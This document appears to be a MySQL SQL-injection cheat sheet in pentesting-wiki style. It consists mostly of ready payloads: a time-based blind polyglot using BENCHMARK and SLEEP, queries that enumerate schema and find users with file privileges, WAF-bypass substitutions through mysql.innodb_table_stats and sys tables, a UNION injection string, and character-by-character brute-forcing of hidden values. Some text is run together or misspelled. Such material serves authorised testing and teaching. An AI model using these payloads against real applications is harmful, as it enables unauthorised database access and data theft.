SELECT*FROM some_table WHERE double_quotes ="IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
Remember that in "modern" versions of MySQL you can substitute "information_schema.tables" for "mysql.innodb_table_stats" (This could be useful to bypass WAFs).
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Getname of the tablesSELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Getname of the columns of the tableSELECT<COLUMN1>,<COLUMN2>FROM<TABLE_NAME>; #GetvaluesSELECT user FROM mysql.user WHERE file_priv='Y'; #Users withfile privileges
Only 1 value
group_concat()
Limit X,1
Blind one by one
substr(version(),X,1)='r' or substring(version(),X,1)=0x70 or ascii(substr(version(),X,1))=112
Remember that in "modern" versions of MySQL you can substitute information_schema.tables for mysql.innodb_table_stats**or for _sys.x$schema_flattened_keys_ or for sys.schema_table_statistics**
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
Retrieving values without the column name
If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:
# When a True is returned, you have found the number of columnsselect (select "", "") = (SELECT*fromdemolimit1); # 2columnsselect (select "", "", "") < (SELECT*fromdemolimit1); # 3columns
Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:
# When True, you found the correct char and can start ruteforcing the next positionselect (select 1, 'flaf') = (SELECT*fromdemolimit1);